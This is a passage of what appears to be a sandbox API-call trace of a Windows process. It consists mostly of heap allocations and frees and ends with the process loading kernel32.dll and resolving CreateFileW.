out: hHeap=0x1780000) returned 1 [0122.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0122.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0122.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0122.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0122.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0122.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0122.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0122.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0122.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bf0 [0122.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0122.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0122.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0122.108] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0122.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0122.108] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0122.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0122.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21f0 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0122.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0122.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0122.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0122.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9dd0 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0122.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0122.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0122.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0122.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0122.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0122.111] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0122.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0122.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0122.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0122.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0122.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0122.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0122.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0122.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0122.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0122.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.116] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0122.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0122.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0122.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0122.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0122.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0122.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0122.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0122.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0122.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0122.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0122.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0122.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.120] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0122.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0122.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca8c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0122.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 